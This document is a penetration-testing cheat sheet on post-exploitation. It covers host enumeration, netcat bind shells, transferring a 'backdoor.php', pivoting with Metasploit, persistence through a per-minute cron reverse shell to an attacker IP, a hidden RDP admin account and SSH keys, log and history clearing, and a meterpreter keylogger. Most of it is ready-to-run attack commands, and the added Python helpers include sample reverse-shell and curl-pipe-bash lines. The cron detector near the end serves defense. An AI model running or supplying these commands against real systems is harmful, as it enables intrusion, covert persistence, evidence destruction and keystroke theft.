Post-Exploitation & Commands

Useful Commands

Linux

ctrl + c # terminate the currently running command
ctrl + r # search the current terminal session's command history
ctrl + a # go to the start of the line
ctrl + e # go to the end of the line
ctrl + z # suspend the foreground program (resume it with fg, or keep it running in the background with bg)

# Encode file to Base64
base64 -w 0 file.txt
# Count Lines
wc -l <file>
# Count Chars
wc -c <file>
# Sort and remove duplicate lines
sort -u file # same result as cat file | sort | uniq
# Replace string inside a file
sed -i 's/OLD/NEW/g' file.txt

# Decompress
7z x file.7z                 # .7z  (note: the extract command is "x", not "-x")
bzip2 -d file.bz2            # .bz2
gunzip file.gz               # .gz
tar -xvzf file.tar.gz        # .tar.gz
tar -jxf file.tar.bz2        # .tar.bz2
tar -xvjf file.tbz           # .tbz
tar -xvzf file.tgz           # .tgz
unzip file.zip               # .zip
unxz file.xz                 # .xz            (apt install xz-utils)

# Clipboard
xclip -sel c < file.txt

# Search strings inside files
grep -ri password # search "password" (case-insensitive) recursively under the current directory
grep -Ei 'pass|user' file.txt # search for "pass" or "user" in file.txt
grep -Eri 'pass|user' # same, recursively under the current directory
# with color, ignore binaries (-I), print line number (-n) and redirect errors
grep --color=auto -rn -iIE "PASSW|PWD" 2>/dev/null

# Switch to root (prompts for the root password)
su
# Generate a password hash and paste it into the second field of the user's line in /etc/shadow (needs write access to /etc/shadow)
openssl passwd -1 -salt <salt> <new_pass> # -1 = MD5-crypt ($1$, weak), -5 = SHA-256-crypt ($5$), -6 = SHA-512-crypt ($6$, strongest); use the scheme the other entries on the target already use

Enumeration

# System info
# Print linux distro version
cat /etc/os-release
cat /etc/issue
lsb_release -a
# Kernel version, architecture and hostname (the kernel version is the starting point for kernel exploit lookups)
uname -a 
# Print environment variables
env 
# hardware info
lscpu
# RAM usage
free -h
# disk usage
df -h
# list installed packages with versions (Debian/Ubuntu; rpm -qa on RPM-based distros)
dpkg -l

# Enumerate Users
whoami
groups <user>
# Create a user with a home directory and bash as login shell
useradd -m <user> -s /bin/bash
# Add a user to the root group (gid 0); noisy and easy to spot in /etc/group
usermod -aG root <user>
# most recent login of every account, including SSH logins (reads /var/log/lastlog)
lastlog
# login history of users (reads /var/log/wtmp)
last

# Enumerate Network
ip a # interfaces and addresses; a second interface or subnet means there may be another network to pivot into
# display hostname
cat /etc/hostname
# static IP-to-name mappings (useful to discover internal hostnames/domains you can reach)
cat /etc/hosts
# DNS servers used by the host (often the default gateway, or a domain controller in AD networks)
cat /etc/resolv.conf

# Listening sockets and connections (-t tcp, -u udp, -l listening, -p owning process, -n numeric; ss -tulpn where netstat is missing)
netstat -tulpn
# Display the host's ARP cache (IPs this host has recently talked to)
arp -a
# View and modify the routing table
route # Note: the default gateway matters: it is often also the DNS/DHCP server and the path into other subnets

# Processes & services
ps aux # Display all processes; output is truncated to the terminal width
ps auxw # use 132 columns instead of the terminal width
ps auxww # use as many columns as needed (full command lines)
ps aux | grep root # processes running as root: candidates for privesc
top # dynamic real-time view of a running system (like Task Manager)
# display the crontab of the current user (run as root to see root's; other users: crontab -u <user> -l)
crontab -l
# list the system-wide cron files and directories
ls -al /etc/cron*
# print the system crontab and the drop-in jobs (plain cat /etc/cron* fails on the cron.* directories)
cat /etc/crontab /etc/cron.d/*

Windows

:: System info
systeminfo
:: Get current user
whoami  
:: Get current user privileges (SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, SeBackupPrivilege and SeDebugPrivilege are classic privesc paths)
whoami /priv
:: Get installed updates; compare the KB list and dates against the patches for known privesc bugs
wmic qfe get Caption,HotFixID,InstalledOn,Description 
:: List local groups
net localgroup
:: Get the members of a group -> net localgroup administrators
net localgroup <group>
:: Get user info
net user <user>

:: Network Info
ipconfig /all
:: listening ports and connections with the owning PID (-a all, -n numeric, -o PID; match the PID against tasklist)
netstat -ano
:: shows the Windows Firewall state for all profiles (Domain, Private, Public)
netsh advfirewall show allprofiles
:: display arp table (arp cache to discover other IP addresses on the target network)
arp -a
:: print route table (useful during the pivoting phase of post-exploitation as it can reveal network routes)
route print

:: Processes & Services
:: lists started (running) services
net start
:: same as above with extra details like pid, state, start mode
wmic service list brief
:: stop a service
net stop <servicename>
:: list processes with the services they host
tasklist /svc 
:: list scheduled tasks
schtasks /query /fo list /v
:: Automation : JAWS - https://github.com/411Hall/JAWS
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

:: Change a Windows user's password (resets it: noisy, and locks the legitimate user out)
net user <username> <new_pass>

Bind Shell

A bind shell listens on the target and the attacker connects inbound to it. It is the less preferred type: inbound connections to a host are usually blocked by a firewall or flagged as suspicious, and the open port is visible to anyone who scans the target. It is still the right choice when the target has no route back to the attacker (see the Pivoting section below).

# Windows (target)
nc -nvlp <target_port> -e cmd.exe 
nc.exe -nvlp <target_port> -e cmd.exe

# Linux (target) (-e needs netcat-traditional or ncat; the OpenBSD nc has no -e, so use a mkfifo-based or bash /dev/tcp shell instead)
nc -nvlp <target_port> -e /bin/bash

# Linux (attacker)
nc -nv <target_ip> <target_port>

# Windows (attacker)
nc.exe -nv <target_ip> <target_port>


# Linux Metasploit (attacker)
use multi/handler
set payload generic/shell_bind_tcp # Try also "linux/x64/shell/bind_tcp" or "linux/x64/shell_bind_tcp"
set rhost <target_ip>
set lport <target_port>
run

Transfer files

# HTTP Windows (certutil downloads are commonly flagged by AV/EDR)
certutil -urlcache -f http://<host>/backdoor.php backdoor.php
# HTTP Linux
wget http://<host>/backdoor.php

# Netcat [the receiving side listens; useful when the target cannot reach you but you can reach it: run the listener on the target and push the file from your machine]
nc -nvlp <target_port> > backdoor.php         # [recipient]
nc -w 3 <ip> <target_port> < backdoor.php    # [sender]

# TIPS
# 1 tip - Progress indicator in netcat
pv backdoor.php | nc -w 3 <ip> <target_port> # [sender] (install pv)
# 2 tip - Check the md5 on both sides; netcat has no integrity check, so a truncated transfer only shows up here
md5sum backdoor.php

# Note: netcat "-n" means no DNS resolution (IP addresses only); "-w 3" closes the connection after 3 seconds without traffic
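As an added example (not from the original notes), the netcat transfer above carried out with Python sockets on loopback: the recipient listens and reads until EOF, the sender pushes the file and closes its write side (the equivalent of nc's -w timeout ending the connection), and both sides compare MD5s. A truncate_at parameter simulates a sender that drops mid-transfer, to show why the hash comparison matters. The file content, the 127.0.0.1 addresses and the function names are assumptions for the demo.

```python
import hashlib
import socket
import threading
from typing import Optional

# Constructed stand-in for backdoor.php (not a real payload); any bytes work.
SAMPLE_FILE = b"<?php echo 'constructed sample content'; ?>\n" * 2000


def md5sum(data: bytes) -> str:
    """Hex digest, the value `md5sum <file>` prints; compare it on both sides."""
    return hashlib.md5(data).hexdigest()


def start_listener(port: int = 0) -> socket.socket:
    """Recipient, first half: `nc -nvlp <port>`. Port 0 lets the OS pick a free port
    (read it back with getsockname()); a real run uses a fixed port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    return srv


def receive_file(srv: socket.socket, timeout: float = 5.0) -> bytes:
    """Recipient, second half: `> backdoor.php`. Accept one sender and read until it
    closes the connection; netcat has no framing, so EOF is the only end-of-file signal."""
    srv.settimeout(timeout)
    conn, _ = srv.accept()
    chunks = []
    with conn:
        conn.settimeout(timeout)
        while True:
            chunk = conn.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
    srv.close()
    return b"".join(chunks)


def send_file(host: str, port: int, data: bytes, timeout: float = 3.0) -> None:
    """Sender: `nc -w 3 <ip> <port> < backdoor.php`. shutdown(SHUT_WR) is the EOF the
    listener waits for; without it the recipient sits there until the timeout expires."""
    with socket.create_connection((host, port), timeout=timeout) as c:
        c.sendall(data)
        c.shutdown(socket.SHUT_WR)


def transfer_and_verify(data: bytes = SAMPLE_FILE, truncate_at: Optional[int] = None) -> dict:
    """Run both sides over loopback and compare MD5s. truncate_at simulates an interrupted
    sender (only the first N bytes go out), which the byte count and hash both expose."""
    srv = start_listener()
    port = srv.getsockname()[1]
    result = {}

    def recipient():
        result["received"] = receive_file(srv)

    t = threading.Thread(target=recipient, daemon=True)
    t.start()
    send_file("127.0.0.1", port, data if truncate_at is None else data[:truncate_at])
    t.join(10)
    received = result.get("received", b"")
    sent_md5, got_md5 = md5sum(data), md5sum(received)
    return {
        "bytes_sent": len(data),
        "bytes_received": len(received),
        "sent_md5": sent_md5,
        "received_md5": got_md5,
        "intact": sent_md5 == got_md5,
    }


if __name__ == "__main__":
    print(transfer_and_verify())                 # intact: True
    print(transfer_and_verify(truncate_at=1024)) # intact: False, 1024 bytes received
```

The listener is created before the sender connects, so the connect lands in the accept backlog even if the recipient thread has not reached accept() yet; that mirrors the real procedure, where the listener must be up before you run the sender.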

[Fully] interactive shell

Interactive shell

/bin/bash -i # Linux (interactive bash, but still without a TTY: no tab completion, no job control, and ctrl+c kills the whole shell)

Fully interactive shell

# 1 Step: allocate a pseudo-terminal on the target (use whichever python exists there)
python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'

# 2 Step: on the attacker side, background the nc/listener process
CTRL + Z # Press CTRL + Z to background the process and get back to your own shell

# 3 Step: put the local terminal in raw mode without echo (so ctrl+c, arrow keys and tab are passed to the remote pty) and bring the listener back to the foreground
stty raw -echo; fg

# 4 Step: tell the remote shell which terminal type it is talking to (optionally also set the size with stty rows <n> cols <m>); run reset locally when you are done to restore your terminal
export TERM=xterm

Pivoting & Port forwarding

  • Metasploit (in meterpreter)

    • ipconfig : find the subnets the compromised host is attached to (it may have an interface into a network you cannot reach directly)

    • run autoroute -s <subnet> (subnet of the internal network). Any traffic Metasploit sends to a host in that subnet is then relayed through the meterpreter session.

      • Example:

        • ipconfig shows IP 19.9.29.148, Netmask 255.255.240.0

        • 255.255.240.0 is a /20, so the route is the interface's network address (the IP with the host bits cleared) with that prefix: run autoroute -s <network>/20

    • run autoroute -p : display the active routing table.

    • auxiliary/scanner/portscan/tcp : port scan through the route. NOTE: Metasploit's scanner is limited (no version detection etc.), so nmap is better; to use nmap through the session, set up a port forward first.

    • since target_sys_2 has no route back to attacker_sys, a reverse payload cannot call home: use a bind payload such as windows/meterpreter/bind_tcp

  • Port forwarding (meterpreter/metasploit)

    • portfwd add -l 1234 -p 80 -r <target_sys_2_ip> : forward local port 1234 on the attacker to port 80 on target 2, through the session. In this case we want to scan port 80 of target 2.

    • portfwd list

    • nmap -sV -sC -p 1234 localhost : the scan of localhost:1234 actually hits target 2 on port 80, so the service and banner reported belong to target 2
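An added example (not part of the original notes or of Metasploit) for the autoroute step above: it parses meterpreter ipconfig or Linux ip a output, derives each interface's network in CIDR form (255.255.240.0 becomes /20 and the host bits are cleared) and produces the run autoroute -s lines, skipping loopback, link-local and any network the attacker already reaches. Both sample outputs are constructed; the 19.9.29.148 / 255.255.240.0 pair is the page's own, the other addresses and MACs are made up.

```python
import ipaddress
import re

# Constructed sample of meterpreter's `ipconfig` output (not captured from a real host).
SAMPLE_METERPRETER_IPCONFIG = """\
Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 12
============
Name         : Ethernet0
Hardware MAC : 00:0c:29:aa:bb:cc
MTU          : 1500
IPv4 Address : 19.9.29.148
IPv4 Netmask : 255.255.240.0

Interface 13
============
Name         : Ethernet1
Hardware MAC : 00:0c:29:dd:ee:ff
MTU          : 1500
IPv4 Address : 10.10.20.7
IPv4 Netmask : 255.255.255.0
"""

# Constructed sample of `ip a` on a Linux foothold (same idea, different format).
SAMPLE_IP_A = """\
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    inet 127.0.0.1/8 scope host lo
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    inet 192.168.56.20/24 brd 192.168.56.255 scope global eth0
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    inet 172.16.5.3/16 brd 172.16.255.255 scope global eth1
"""

# meterpreter prints the IPv4 netmask on the line right after the IPv4 address.
METERPRETER_RE = re.compile(r"IPv4 Address\s*:\s*(\S+)\s+IPv4 Netmask\s*:\s*(\S+)")
# `ip a` prints "inet a.b.c.d/nn"; "inet6" lines do not match because of the required space.
IP_A_RE = re.compile(r"^\s*inet\s+(\d+\.\d+\.\d+\.\d+/\d+)", re.MULTILINE)


def interface_networks(output: str) -> list:
    """Networks of every interface in meterpreter `ipconfig` or Linux `ip a` output,
    in the order they appear, without loopback, link-local or duplicates."""
    interfaces = []
    for addr, mask in METERPRETER_RE.findall(output):
        interfaces.append(ipaddress.ip_interface(f"{addr}/{mask}"))  # accepts dotted masks
    for cidr in IP_A_RE.findall(output):
        interfaces.append(ipaddress.ip_interface(cidr))
    networks = []
    for iface in interfaces:
        net = iface.network  # host bits cleared, e.g. 19.9.29.148/20 -> 19.9.16.0/20
        if net.is_loopback or net.is_link_local or net in networks:
            continue
        networks.append(net)
    return networks


def autoroute_commands(output: str, already_reachable=()) -> list:
    """One `run autoroute -s` line per network the foothold can see but the attacker
    cannot reach directly. already_reachable lists CIDRs the attacker is already on
    (typically the one the session came in through)."""
    skip = [ipaddress.ip_network(n) for n in already_reachable]
    return [f"run autoroute -s {net}" for net in interface_networks(output) if net not in skip]


if __name__ == "__main__":
    for line in autoroute_commands(SAMPLE_METERPRETER_IPCONFIG):
        print(line)
    for line in autoroute_commands(SAMPLE_IP_A, already_reachable=["192.168.56.0/24"]):
        print(line)
```

Paste the printed lines into the meterpreter session; run autoroute -p afterwards confirms they were added. Passing the network you already reach in already_reachable avoids pointlessly routing traffic for your own subnet through the session.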

Persistence

Windows

  • Metasploit

    • search persistence (filter on the Windows modules)

    • Ex: exploit/windows/local/persistence_service

      • Generates an executable, uploads it to the target and installs it as a Windows service, so the payload starts every time the service starts (i.e. at boot). Admin or SYSTEM privileges are required, and a new service plus a dropped binary are easy for defenders to spot.

      • When you want to connect again you need a listener (multi/handler with the same payload) to receive the connection

  • Enable RDP

    • with metasploit : search enable_rdp (post/windows/manage/enable_rdp, set SESSION to your meterpreter session)

      • Connect to the victim from the attacker machine (an RDP client such as xfreerdp or rdesktop, port 3389)

        • Note: you need a username and password; if you don't have the password, change it with net user <username> <new_pass> (suspicious in a real environment, and it locks the legitimate user out) or crack the NTLM hash...

        • Note 2: you can create a new account and add it to the Administrators group...

    • second way with metasploit/meterpreter (creates the account and the settings automatically):

      • In meterpreter run getgui -e -u user_you_want -p password_you_want (getgui is a deprecated meterpreter script; enable_rdp is the maintained equivalent)

        • enables the RDP service -> creates a new user with the provided parameters -> hides the user from the Windows login screen -> adds the user to the Remote Desktop Users and Administrators groups.

Linux

  • Metasploit

    • search persistence (filter on the Linux modules)

      • Example: post/linux/manage/sshkey_persistence (adds an SSH key to a specified user's authorized_keys; needs privileges to write that file, so root for any user other than the current one)

  • Via SSH key

    • After gaining access to a Linux system, copy an existing SSH private key (e.g. ~/.ssh/id_rsa) to your machine and use it with ssh -i, or append your own public key to the user's ~/.ssh/authorized_keys

  • With cron jobs

    • Set up a listener on the attacker machine

    • echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1'" > cron : write a crontab file (five asterisks = every minute)

    • crontab cron : install the file as the current user's crontab (this replaces any existing crontab; note that -i does not install a file, it only asks for confirmation with -r)

    • crontab -l : show the crontab of the current user to confirm the job is there

    • NOTE: if the command doesn't work (e.g. the target's /bin/sh has no /dev/tcp, or bash is missing), try another reverse shell one-liner
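An added example (not from the original notes) of the check a defender would run against the cron persistence above: parse crontab lines into schedule and command and flag commands that look like reverse shells or download-and-run stagers (/dev/tcp, nc -e, bash -i, python with socket, curl | bash, mkfifo), noting the every-minute schedule as well. The crontab lines, the 10.0.0.5 address and the indicator list are constructed for the demo; a real sweep would feed it crontab -l -u <user> for every user plus /etc/crontab and /etc/cron.d/*.

```python
import re

# Constructed crontab-style lines (addresses and paths are made up for the demo).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
0 3 * * 1 /usr/local/bin/backup.sh
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'
*/5 * * * * nc -e /bin/sh 10.0.0.5 4445
@reboot python3 -c 'import socket,subprocess,os'
30 2 * * * curl -s http://10.0.0.5/x.sh | bash
"""

# (label, regex over the command part of the line); order determines the order of hits.
INDICATORS = [
    ("dev-tcp reverse shell", re.compile(r"/dev/(tcp|udp)/")),
    ("interactive bash", re.compile(r"\bbash\s+-i\b")),
    ("netcat -e", re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s")),
    ("python socket", re.compile(r"\bpython[23]?\b.*\bsocket\b")),
    ("download-and-run", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z|da)?sh\b")),
    ("named pipe", re.compile(r"\bmkfifo\b")),
]


def parse_cron_line(line: str):
    """Split a crontab line into (schedule, command). Returns None for blank lines,
    comments and VAR=value lines. Lines from /etc/crontab carry a user field after the
    schedule; it is left inside the command part, which does not affect matching."""
    s = line.strip()
    if not s or s.startswith("#") or re.match(r"^[A-Za-z_]\w*=", s):
        return None
    if s.startswith("@"):  # @reboot, @hourly, ... take the place of the five fields
        sched, _, cmd = s.partition(" ")
        return sched, cmd.strip()
    fields = s.split(None, 5)
    if len(fields) < 6:
        return None
    return " ".join(fields[:5]), fields[5]


def scan_crontab(text: str) -> list:
    """Return one finding per line whose command matches at least one indicator."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parsed = parse_cron_line(raw)
        if parsed is None:
            continue
        schedule, command = parsed
        hits = [label for label, rx in INDICATORS if rx.search(command)]
        if hits:
            findings.append({
                "line": lineno,
                "schedule": schedule,
                "command": command,
                "indicators": hits,
                "every_minute": schedule == "* * * * *",  # the cadence the page's job uses
            })
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {', '.join(f['indicators'])} [{f['schedule']}] {f['command']}")
```

The every-minute flag on its own is weak (legitimate jobs use it too), so it is reported alongside the indicator hits rather than as a finding by itself; the command-pattern list is the part to extend with whatever reverse-shell one-liners you expect on your hosts.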

Clearing tracks

Windows

# Metasploit/Meterpreter
clearev  # clear the Application, System, and Security logs. Caveat: clearing the Security log itself writes Event ID 1102 ("The audit log was cleared") and clearing the System log writes Event ID 104, so this is loud for a SOC

Linux

history -c                          # clear the in-memory history of the current shell
cat /dev/null > ~/.bash_history     # empty the history file on disk (bash writes the session's history there on exit, so do both; unset HISTFILE stops it being written at all)

Keylogger

# With metasploit (meterpreter; the session must run in a process with access to the user's desktop, e.g. after migrating into explorer.exe)
keyscan_start          # start capturing keystrokes
keyscan_dump           # print the keystrokes captured so far (keyscan_stop ends the capture)
